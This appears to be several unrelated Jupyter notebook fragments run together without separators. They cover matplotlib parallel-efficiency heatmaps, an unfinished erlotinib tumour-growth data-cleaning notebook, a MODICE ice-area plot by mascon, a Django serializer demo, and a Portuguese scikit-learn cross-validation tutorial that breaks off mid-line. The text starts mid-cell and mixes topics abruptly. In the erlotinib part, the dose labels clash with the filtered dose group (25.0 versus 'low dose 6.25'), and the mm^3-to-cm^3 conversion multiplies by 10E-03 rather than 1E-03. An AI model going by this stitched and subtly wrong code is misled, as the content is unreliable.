plt.plot([0],[10], label="Dynamic", color = "black", linestyle = "dotted") plt.legend() plt.grid(True) plt.yscale('log') plt.ylabel("Population") plt.yticks(pop_sizes,pop_sizes) plt.xscale('log') plt.xlabel("Time") plt.ylim(0.95*pop_sizes[0],1.05*pop_sizes[-1]) plt.tick_params(axis='both', which='major', labelsize=10) plt.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPRuntimeGraphs.pdf") plt.show() pop_sizes_1=pop_sizes[0:-1] means1PPP = data1worker.loc[data1worker['Look_ahead']==True]['Runtime Expectation'].values means1PPP = np.append(means1PPP, 4*means1PPP[-1]) par_efficiency=np.zeros((len(nodelist),len(pop_sizes))) for i in range(0,len(nodelist)): for j in range(0,len(pop_sizes)): par_efficiency[i,j]=means1PPP[j]/(PPParray[i,j]*nodelist[i]) par_efficiency_ori=np.zeros((len(nodelist),len(pop_sizes))) for i in range(0,len(nodelist)): for j in range(0,len(pop_sizes)): par_efficiency_ori[i,j]=means1PPP[j]/(ORIarray[i,j]*nodelist[i]) y = np.array([math.sqrt(2),2,4,8,16,32])*48 y1=np.append(48,y) y2=y1[:] kekse=np.zeros((len(nodelist)+1,len(pop_sizes)+1)) kekse[:-1,:-1]=par_efficiency fig, ax = plt.subplots(1,1,figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), kekse, vmin=0, vmax=1) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="N=W") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="N=2W") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="N=10W") plt.xscale('log') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) ax.axis('tight') plt.title('Parallel efficiency - LA') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPLAParallelEff.pdf") plt.show() y = np.array([math.sqrt(2),2,4,8,16,32])*48 y1=np.append(48,y) y2=y1[:] kekse=np.zeros((len(nodelist)+1,len(pop_sizes)+1)) kekse[:-1,:-1]=par_efficiency_ori fig, ax = plt.subplots(1,1,figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), kekse, vmin=0, vmax=1) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="N=W") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="N=2W") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="N=10W") plt.xscale('log') plt.legend(loc = 'upper left') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) ax.axis('tight') plt.title('Parallel efficiency - DYN') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPDYNParallelEff.pdf") plt.show() vmax=None diff = np.zeros((len(nodelist)+1,len(pop_sizes)+1)) diff[:-1,:-1] = par_efficiency-par_efficiency_ori fig, ax = plt.subplots(1,1, figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), diff, vmin=0, vmax=vmax) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="Pop=Nodes") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="Pop=2*Nodes") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="Pop=10*Nodes") plt.xscale('log') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) plt.title('Change in par. efficiency (difference)') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPChangeinParEff.pdf") plt.show() vmax=None frac = np.zeros((len(nodelist)+1,len(pop_sizes)+1)) frac[:-1,:-1] = par_efficiency/par_efficiency_ori fig, ax = plt.subplots(1,1, figsize=(5,4)) im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]), frac, vmin=1, vmax=vmax) fig.colorbar(im) plt.plot(y,y, color="yellow", linestyle="dashed", label="Pop=Workers") plt.plot(2*np.array(y1),y1, color="orangered", linestyle="dashed", label="Pop=2*Workers") plt.plot(10*np.array(y2),y2, color="red", linestyle="dashed", label="Pop=10*Workers") plt.xscale('log') plt.xlabel("Population size N") plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off tick_locs_x = np.zeros(len(pop_sizes)) for i in range(0,len(pop_sizes)-1): tick_locs_x[i] = pop_sizes[i]*math.sqrt(pop_sizes[i+1]/pop_sizes[i]) tick_locs_x[-1]=2*pop_sizes[-1] plt.xticks(tick_locs_x,pop_sizes) plt.yscale('log') plt.ylabel("#Workers W") plt.tick_params( axis='y', # changes apply to the x-axis which='minor', # both major and minor ticks are affected left=False, # ticks along the bottom edge are off right=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off plt.yticks(math.sqrt(2)*nodelist,nodelist) plt.title('Acceleration factor') plt.xlim(xmin=64,xmax=16384) ax.tick_params(axis='both', which='major', labelsize=10) fig.tight_layout() plt.savefig("/home/felipe/MTGraphics/MJP/MJPAccelerationFact.pdf") plt.show():6: MatplotlibDeprecationWarning: shading='flat' when X and Y have the same dimensions as C is deprecated since 3.3. Either specify the corners of the quadrilaterals with X and Y, or pass shading='auto', 'nearest' or 'gouraud', or set rcParams['pcolor.shading']. This will become an error two minor releases later. im = ax.pcolormesh(np.append(pop_sizes,4*pop_sizes[-1]), np.append(nodelist,2*nodelist[-1]),Erlotinib Intermediate Dose Treatment Data: LXF A677 Implanted in MiceIn [1], the tumour growth inhibition (TGI) PKPD model of Erlotinib and Gefitinib was derived from two separate *in vivo* experiments. In particular, the growth of patient-derived tumour explants LXF A677 (adenocarcinoma of the lung) and cell line-derived tumour xenografts VXF A431 (vulva cancer) in mice were monitored. Each experiment comprised a control growth group and three groups that were treated with either Erlotinib or Gefitnib at one of three dose levels. Treatments were orally administered once a day.In this notebook, DESCRIPTION TO BE COMPLETED Raw PK data for all dosing regimens# # Import raw LXF A677 Erlotinib PK data. # import os import pandas as pd # Import LXF A677 PK data path = os.path.dirname(os.getcwd()) # make import independent of local path structure pk_data_raw = pd.read_csv(path + '/data_raw/PK_LXF_erlo.csv', sep=';') # Display data print('Raw PK Data Set for all dosing regimens:') pk_data_rawRaw PK Data Set for all dosing regimens:Raw PD data for all Erlotinib and Gefitinib dosing regimens# # Import raw PD data. # import os import pandas as pd # Import LXF A677 PD data path = os.path.dirname(os.getcwd()) # make import independent of local path structure pd_data_raw = pd.read_csv(path + '/data_raw/PKPD_ErloAndGefi_LXF.csv', sep=';') # Display data print('Raw PD Data Set for all Erlotinib and Gefitinib dosing regimens:') pd_data_rawRaw PD Data Set for all Erlotinib and Gefitinib dosing regimens:Cleaning the dataDISCUSSION TO BE COMPLETEDNeed - ID- Time- Plasma concentration (check whether the value is actually the plasma concentration)- Tumour volume- Body weight- Dose Time- Dose Amount Cleaning the dataWe obtained those datasets from the authors of [1]. There is a lot of information in the datasets that are not relevant for our purposes.All we really need for our analyis is- **ID** indicating which mouse was measured,- **BODY WEIGHT** indicating the weight of the mouse- **TIME CONC** indicating the time point of each plasma concentration measurement,- **CONC** indicating the measured plasma concentration of the compound,- **TIME VOLUME** indicating the time point of each tumour volume measurement,- **TUMOUR VOLUME** indicating the measured tumour volume,- **DOSE TIME** indicating the time point when the dose was administered,- **DOSE AMOUNT** indicating the amount of the administered dose.It is not unambiguous to identify said properties in the dataframes. That is why we detail our mapping in the following and document the reasons for our decisions.- **ID**: Mapping is obvious,- **BODY WEIGHT**: Mapped to **BW** after confirmation from the authors. **BW** measured in $\text{g}.- **TIME CONC**: **TIME** column in `pk_data_raw`. Time measured in $\text{day}$.- **CONC**: **Y** column in `pk_data_raw` after confirmation from authors. Concentration measured in $\text{mg/L}$.- **TIME VOLUME**: **TIME** column in either `pk_data_raw` or `pd_data_raw`. Time measued in $\text{day}$.- **TUMOUR VOLUME**: **Y** column in `pd_data_raw`. Tumour measured in $\text{mm}^3$.- **DOSE TIME**: We take the dosing times from the description in the reference [1], due to unfamiliarity with Monlix's conventions.- **DOSE AMOUNT**: We take the dosing times from the description in the reference [1], due to unfamiliarity with Monlix's conventions.The low dose dosing regimen for Erlotinib was an oral dose of $6.25\, \text{mg/kg/L}$ per day from day 3 to 16. According to Roche's study report doses were adjusted throughout the experiment. However, the body weight was only measured on days 0, 2, 4, 7, 9, 11, 14, 16, 18, 21, 23, 25, 28, 30. As a result it may be assumed that also the dose was only adjusted when a new measurement of the body weight was obtained, despite being administered daily.NOTE: THE DOSE AMOUNT in the DOSE column DEVIATES from THEORETICAL DOSE. WHY? THERE IS NO DOSE IN ROCHE'S REPORT.Remarks on remaining column keys:- **DOSE**, **ADDL**, **II**: According to Monolix these keys encode for the dose amount (DOSE), the number of doses (ADDL) to add in addition to the dose in intervals specified by II. Since we take the doses from the study directly, we don't need those keys.- **YTYPE**, **CENS**: According to Monolix these keys encode for the data type (tumour volume in this case) and whether the measurered values were subject to censoring. We should make sure that censored data should be dealt with accordingly and only one data type is present in the data set.- **CELL LINE**, **DOSE GROUP**, **DRUG**, **EXPERIMENT**: These customised keys are quite self-explanatory. We should make sure that the data we use is uni-valued in these columns.- **DRUGCAT**: The meaning of this key is less clear. It may refer to the drug category encoding for the route of administration. We should make sure that this column is also only uni-valued. If mutliple values are assumed we need to clarify what this column means.- **BW**: refers to the body weight of the mouse at the time of the measurement.- **KA**, **V**, **KE**, **w0**, **I**: These keys are customised keys, whose meaning is not immediately clear. They appear to be parameters of the PKPD model. We are interested in infering parameters, so we are not interested in any previously obtained parameters, and choose to ignore this column.For reasons that will become clear later, we will choose to measure the tumour volume in $\text{cm}^3$. Create Erlotinib low dose PKPD dataset# # Create LXF A677 data from raw data set. # import os import numpy as np import pandas as pd # Get path to directory path = os.path.dirname(os.getcwd()) # make import independent of local path structure # Import LXF A677 Erlotinib PK data pk_data_raw = pd.read_csv(path + '/data_raw/PK_LXF_erlo.csv', sep=';') # Import LXF A677 PD data pd_data_raw = pd.read_csv(path + '/data_raw/PKPD_ErloAndGefi_LXF.csv', sep=';') # Make sure that data is stored as numeric data pk_data = pk_data_raw.apply(pd.to_numeric, errors='coerce') pd_data = pd_data_raw.apply(pd.to_numeric, errors='coerce') # Mask PD data for Erlotinib treatment (DRUG 1) pd_data = pd_data[pd_data['DRUG'] == 1] # Mask for the low dose group (DOSE GROUP 6.25) pk_data = pk_data[pk_data['DOSE GROUP'] == 25.0] pd_data = pd_data[pd_data['DOSE GROUP'] == 25.0] # Sort dataframes according to measurement times pk_data.sort_values('TIME', inplace=True) pd_data.sort_values('TIME', inplace=True) # Assert that there is an equal number of mice with tumour volume and concentration measurements assert len(pk_data['#ID'].unique()) == len(pd_data['#ID'].unique()) # Assert that the mice in both datasets are the same assert np.array_equal(np.sort(pk_data['#ID'].unique()), np.sort(pd_data['#ID'].unique())) # Get dose relevant columns and rows from dataframes (needed to reconstruct dosing schedule further down) pk_dose_data = pk_data[~pk_data['DOSE'].isnull()][['#ID', 'TIME', 'DOSE', 'BW']] pd_dose_data = pd_data[~pd_data['DOSE'].isnull()][['#ID', 'TIME', 'DOSE', 'BW']] # Filter out DOSE entries (we compute those independently) pk_data = pk_data[pk_data['DOSE'].isnull()] pd_data = pd_data[pd_data['DOSE'].isnull()] # Assert that for each mouse the tumour volumes and body weights at a given time point agrees across the two datasets for mouse_id in pk_data['#ID'].unique(): # Create mask for mouse pk_mask = (pk_data['#ID'] == mouse_id) & pk_data['Y'].isnull() pd_mask = pd_data['#ID'] == mouse_id # Assert that times are the same assert np.array_equal(pk_data[pk_mask]['TIME'], pd_data[pd_mask]['TIME']) # Assert that tumour volumes are the same assert np.array_equal(pk_data[pk_mask]['TUMOR SIZE'], pd_data[pd_mask]['Y']) # Assert that body weights agree assert np.array_equal(pk_data[pk_mask]['BW'], pd_data[pd_mask]['BW']) # Initialise final dataframe from PD dataframe and forget about all columns but #ID, TIME, Y and BW data = pd_data[['#ID', 'TIME', 'Y', 'BW']] # Rename TIME to TIME VOLUME in day data = data.rename(columns={'TIME': 'TIME VOLUME in day'}) # Rename Y to TUMOUR VOLUME in cm^3 and convert from mm^3 to cm^3 data = data.rename(columns={'Y': 'TUMOUR VOLUME in cm^3'}) data['TUMOUR VOLUME in cm^3'] *= 10E-03 # Rename BW to BODY WEIGHT in g data = data.rename(columns={'BW': 'BODY WEIGHT in g'}) # Extract #ID, TIME, Y and BW from PK data conc_data = pk_data[['#ID', 'TIME', 'Y', 'BW']] # Filter only for those rows with non-nan entries conc_data = conc_data[~conc_data['Y'].isnull()] # Rename TIME to TIME CONC in day conc_data = conc_data.rename(columns={'TIME': 'TIME CONC in day'}) # Rename Y to CONC in mg/L and convert from ng/L to mg/L conc_data = conc_data.rename(columns={'Y': 'CONC in mg/L'}) conc_data['CONC in mg/L'] *= 1E-03 # Rename BW to BODY WEIGHT in g conc_data = conc_data.rename(columns={'BW': 'BODY WEIGHT in g'}) # Add concentration data to final dataframe data = pd.concat([data, conc_data]) # Define dosing time points in day dose_times = [3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0] # Assert that mice in dose dataframes are the same as in the final data frame assert np.array_equal(np.sort(pk_dose_data['#ID'].unique()), np.sort(data['#ID'].unique())) assert np.array_equal(np.sort(pd_dose_data['#ID'].unique()), np.sort(data['#ID'].unique())) # Initialise dose dataframe based on pk dataframe dose_data = pk_dose_data # Get dose from dataframe TODO: CHECK WHY ENTRIES DEVIATE FROM THEORETICAL VALUES for mouse_id in data['#ID'].unique(): # Create mask for mouse and filter out NaN dose entries pk_mask = (pk_dose_data['#ID'] == mouse_id) pd_mask = (pd_dose_data['#ID'] == mouse_id) # Check that DOSE entries agree across datasets assert np.array_equal(pk_dose_data[pk_mask]['DOSE'], pd_dose_data[pd_mask]['DOSE']) # Add dose amount to data frame for each dose event for time_id, time in enumerate(dose_times): # Mask dataframe for time mask = (dose_data['#ID'] == mouse_id) & (dose_data['TIME'] == time) # If first dose is empty raise an error if dose_data[mask]['DOSE'].empty & (time == dose_times[0]): raise ValueError # Else if dose is empty and not the first dose, fill with previous dose # (Assume that dose has not been altered) elif dose_data[mask]['DOSE'].empty: # Create mask for previous time point mask = (dose_data['#ID'] == mouse_id) & (dose_data['TIME'] == dose_times[time_id-1]) # Append dose to container dose_data = dose_data.append( pd.DataFrame({ '#ID': mouse_id, 'TIME': time, 'DOSE': dose_data[mask]['DOSE'], 'BW': dose_data[mask]['BW']}), ignore_index=True) else: # Assert that there is only one entry per time point assert len(dose_data[mask]['DOSE']) == 1 # Sort dataframes according to measurement times dose_data.sort_values('TIME', inplace=True) # Rename TIME to TIME DOSE dose_data = dose_data.rename(columns={'TIME': 'TIME DOSE in day'}) # Rename DOSE to DOSE AMOUNT and convert from ng to mg dose_data = dose_data.rename(columns={'DOSE': 'DOSE AMOUNT in mg'}) dose_data['DOSE AMOUNT in mg'] *= 1E-03 # Rename BW to BODY WEIGHT dose_data = dose_data.rename(columns={'BW': 'BODY WEIGHT in g'}) # Add dose data to final dataframe data = pd.concat([data, dose_data]) # Display final Erlotinib low dose dataset print('Low dose Erlotinib dataset LXF A677:') dataLow dose Erlotinib dataset LXF A677:Illustrate Erlotinib low dose dataWe use [plotly](https://plotly.com/python/) to create interactive visualisations of the time-series data.def compute_cumulative_dose_amount(times, doses, end_exp, duration=1E-03, start_exp=0): """ Converts bolus dose amounts to a cumulative dose amount series that can be plotted nicely. Optionally the start and end of the experiment can be provided, so a constant cumulative amount is displayed for the entire duration experiment. """ # Get number of measurements n = len(times) # Define how many cumulative time points are needed (add start and end if needed) m = 2 * n + 2 # Create time container cum_times = np.empty(shape=m) # Create dose container cum_doses = np.empty(shape=m) # Add first entry (assuming no base level drug) cum_times[0] = 0 cum_doses[0] = 0 cum_doses[1] = 0 # At start of first dose there will also be no drug # Add start and end time of dose to container cum_times[1:-2:2] = times # start of dose cum_times[2:-1:2] = times + duration # end of dose cum_times[-1] = end_exp # Add cumulative dose amount at start and end of dose to container cum_doses[3:-2:2] = np.cumsum(doses[:-1]) # start of doses (except first dose, dealt with above) cum_doses[2:-1:2] = np.cumsum(doses) # end of doses cum_doses[-1] = np.cumsum(doses)[-1] # final dose level return cum_times, cum_doses # # Visualise Erlotinib low dose data growth data. # # This cell needs the above created dataset: # [data] # import pandas as pd import plotly.colors import plotly.graph_objects as go from plotly.subplots import make_subplots # Get number of individual mice n_mice = len(data['#ID'].unique()) # Define colorscheme colors = plotly.colors.qualitative.Plotly[:n_mice] # Create figure fig = make_subplots(rows=3, cols=1, shared_xaxes=True, row_heights=[0.2, 0.4, 0.4], vertical_spacing=0.05) # Scatter plot of concentration and tumour growth data for index, mouse_id in enumerate(np.sort(data['#ID'].unique())): # Mask dataset for mouse mask = data['#ID'] == mouse_id mouse_data = data[mask] # Get concentration measurement times conc_times = mouse_data['TIME CONC in day'].to_numpy() # Get measured concentrations conc = mouse_data['CONC in mg/L'].to_numpy() # Get tumour volume measurement times volume_times = mouse_data['TIME VOLUME in day'].to_numpy() # Get measured concentrations volumes = mouse_data['TUMOUR VOLUME in cm^3'].to_numpy() # Get dosing time points dose_times = mouse_data['TIME DOSE in day'].to_numpy() # Get doses doses = mouse_data['DOSE AMOUNT in mg'].to_numpy() # Filter nans from dose arrays dose_times = dose_times[~np.isnan(dose_times)] doses = doses[~np.isnan(doses)] # Convert dose events to cumulative dose amount time series dose_times, doses = compute_cumulative_dose_amount( times=dose_times, doses=doses, end_exp=30) # Plot cumulative dosed amount fig.add_trace( go.Scatter( x=dose_times, y=doses, legendgroup="ID: %d" % mouse_id, name="ID: %d" % mouse_id, showlegend=False, hovertemplate= "Cumulative dose in mg
" + "ID: %d
" % mouse_id + "Time: %{x:.0f} day
" + "Tumour volume: %{y:.02f} cm^3
" + "", mode="lines", line=dict(color=colors[index])), row=1, col=1) # Plot concentration data fig.add_trace( go.Scatter( x=conc_times, y=conc, legendgroup="ID: %d" % mouse_id, name="ID: %d" % mouse_id, showlegend=False, hovertemplate= "Plasma Concentration in mg/L
" + "ID: %d
" % mouse_id + "Time: %{x:.0f} day
" + "Plasma concentration: %{y:.02f} mg/L
" + "", mode="markers", marker=dict( symbol='circle', opacity=0.7, line=dict(color='black', width=1), color=colors[index])), row=2, col=1) # Plot tumour volume data fig.add_trace( go.Scatter( x=volume_times, y=volumes, legendgroup="ID: %d" % mouse_id, name="ID: %d" % mouse_id, showlegend=True, hovertemplate= "Tumour volume in cm^3 %s
" + "ID: %d
" % mouse_id + "Time: %{x:} day
" + "Tumour volume: %{y:.02f} cm^3
" + "", mode="markers", marker=dict( symbol='circle', opacity=0.7, line=dict(color='black', width=1), color=colors[index])), row=3, col=1) # Set figure size fig.update_layout( autosize=True, template="plotly_white") # Set X axis label fig.update_xaxes(title_text=r'$\text{Time in day}$', row=3, col=1) # Set Y axes labels fig.update_yaxes(title_text=r'$\text{Amount in mg}$', row=1, col=1) fig.update_yaxes(title_text=r'$\text{Conc. in mg/L}$', row=2, col=1) fig.update_yaxes(title_text=r'$\text{Tumour volume in cm}^3$', row=3, col=1) # Add switch between linear and log y-scale fig.update_layout( updatemenus=[ dict( type = "buttons", direction = "left", buttons=list([ dict( args=[{ "yaxis2.type": "linear", "yaxis3.type": "linear"}], label="Linear y-scale", method="relayout" ), dict( args=[{ "yaxis2.type": "log", "yaxis3.type": "log"}], label="Log y-scale", method="relayout" ) ]), pad={"r": 0, "t": -10}, showactive=True, x=0.0, xanchor="left", y=1.15, yanchor="top" ), ] ) # Show figure fig.show()**Figure 1:** TO BE COMPLETED Export cleaned data# # Export cleaned data sets for inference in other notebooks. # # This cell needs the above created dataset # import os import pandas as pd # Get path of current working directory path = os.getcwd() # Export cleaned LXF A677 control growth data data.to_csv(path + '/data/erlotinib_intermediate_dose_lxf.csv')MODICE v04 area by GRACE mascon, 2000-2014import glob import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np import pandas as pd %pylab inline files = glob.glob("mascons/*area.txt") files import re def read_mascon_data(mascon,filename): df = pd.read_csv( filename, delim_whitespace=True, index_col=0 ) df.head() df = df[['MODICE_area_km^2','MODICE_NS_km^2']] df.columns = [ mascon + '_modice', mascon + '_ns'] return df p = re.compile('MOD44W.([\+\w]+).area') data = [] for file in files: mascon = p.findall(file) print "next file: " + file df = read_mascon_data( mascon[0], file ) data.append(df) df = pd.concat(data, axis=1) dfGet all modice columns (except the one with Greenland, since it's so much larger than the rest)modice_cols = [col for col in df.columns if 'modice' in col] modice_cols.remove('Greenland_modice') df_modice = df[modice_cols] df_modice ns_cols = [col for col in df.columns if '_ns' in col] ns_cols.remove('Greenland_ns') df_ns = df[ns_cols] df_ns ax = df_modice.plot( style='-o') ax.legend(bbox_to_anchor=(1.5,1.0)) ax.set(title="MODICE.v0.4 (1strike) by mascon", ylabel='MODICE area ($km^2$)' ) ax = df_ns.plot( style='-o') ax.legend(bbox_to_anchor=(1.5,1.0)) ax.set(title="MODICE.v0.4 (1strike) never_seen by mascon", ylabel='MODICE area ($km^2$)' )Deserialize# JSON string json_string = '{"title":"Create Snippet", "code": "def create():", "linenos": true, "language":"python","style":"monokai"}' json_string import json data = json.loads(json_string) data # Serializer -> Custom object from snippets.serializers import SnippetSerializer serializer = SnippetSerializer(data=data) print(serializer.is_valid()) # 새 Snippet객체를 생성 (Serializer.create()를 호출) new_snippet = serializer.save() new_snippet.title last_snippet = Snippet.objects.order_by('pk').last() last_snippet.title = 'Create Snippet' last_snippet.code = 'def create()' last_snippet.save() print(last_snippet.title) print(last_snippet.pk) import json update_json_string = '{"title": "Update Snippet", "code": "def update()"}' update_data = json.loads(update_json_string) update_data from snippets.serializers import SnippetSerializer serializer = SnippetSerializer(instance=last_snippet, data=update_data) serializer.is_valid() update_snippet = serializer.save() print(update_snippet.title) print(update_snippet.pk)Update Snippet 4Métodos de validação-cruzada Importimport numpy as npDadosdata_x = np.array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9]) data_y = np.array([ 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]) groups = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3, 3]) assert data_x.shape[0] == data_y.shape[0] data = np.stack((data_x, data_y), axis=1) print("Tamanho do dataset:", data.shape[0]) print(data)Tamanho do dataset: 10 [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]]Holdoutfrom sklearn.model_selection import train_test_split train, valid = train_test_split(data, test_size=0.2, random_state=2 ) print('Treino \n', train) print('\nValidação \n', valid)Treino [[5 1] [0 0] [7 1] [2 0] [3 0] [6 1] [9 1] [8 1]] Validação [[4 0] [1 0]]Stratified Holdouttrain, valid = train_test_split(data, test_size=0.2, random_state=0, stratify=data_y) print('Treino \n', train) print('\nValidação \n', valid)Treino [[0 0] [6 1] [3 0] [9 1] [2 0] [5 1] [1 0] [7 1]] Validação [[4 0] [8 1]]K-foldfrom sklearn.model_selection import KFold kf = KFold(n_splits=5) iteration = 0 for train, valid in kf.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0]] it - 1 Train [[0 0] [1 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[2 0] [3 0]] it - 2 Train [[0 0] [1 0] [2 0] [3 0] [6 1] [7 1] [8 1] [9 1]] Valid [[4 0] [5 1]] it - 3 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [8 1] [9 1]] Valid [[6 1] [7 1]] it - 4 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1]] Valid [[8 1] [9 1]]Stratified K-foldfrom sklearn.model_selection import StratifiedKFold skf = StratifiedKFold(n_splits = 5, shuffle=True) iteration = 0 for train, valid in skf.split(data_x, data_y): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[0 0] [6 1]] it - 1 Train [[0 0] [1 0] [2 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[3 0] [8 1]] it - 2 Train [[0 0] [1 0] [3 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[2 0] [7 1]] it - 3 Train [[0 0] [1 0] [2 0] [3 0] [6 1] [7 1] [8 1] [9 1]] Valid [[4 0] [5 1]] it - 4 Train [[0 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1]] Valid [[1 0] [9 1]]Repeated K-foldfrom sklearn.model_selection import RepeatedKFold rkf = RepeatedKFold(n_splits=5, n_repeats=2, random_state=0) iteration = 0 for train, valid in rkf.split(data_x, data_y): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [1 0] [3 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[2 0] [8 1]] it - 1 Train [[0 0] [1 0] [2 0] [3 0] [5 1] [6 1] [7 1] [8 1]] Valid [[4 0] [9 1]] it - 2 Train [[0 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[1 0] [6 1]] it - 3 Train [[0 0] [1 0] [2 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[3 0] [7 1]] it - 4 Train [[1 0] [2 0] [3 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [5 1]] it - 5 Train [[0 0] [1 0] [2 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0] [5 1]] it - 6 Train [[0 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[1 0] [2 0]] it - 7 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1]] Valid [[8 1] [9 1]] it - 8 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[0 0] [6 1]] it - 9 Train [[0 0] [1 0] [2 0] [3 0] [5 1] [6 1] [8 1] [9 1]] Valid [[4 0] [7 1]]Group k-foldfrom sklearn.model_selection import GroupKFold gkf = GroupKFold(n_splits=3) iteration = 0 for train, valid in gkf.split(data_x, data_y, groups=groups): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] Valid [[6 1] [7 1] [8 1] [9 1]] it - 1 Train [[0 0] [1 0] [2 0] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0] [4 0] [5 1]] it - 2 Train [[3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0] [2 0]]Nested k-foldfrom sklearn.model_selection import StratifiedKFold outer_skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=0) inner_skf = StratifiedKFold(n_splits=4, shuffle=True, random_state=0) iteration = 0 for train_outer, test in 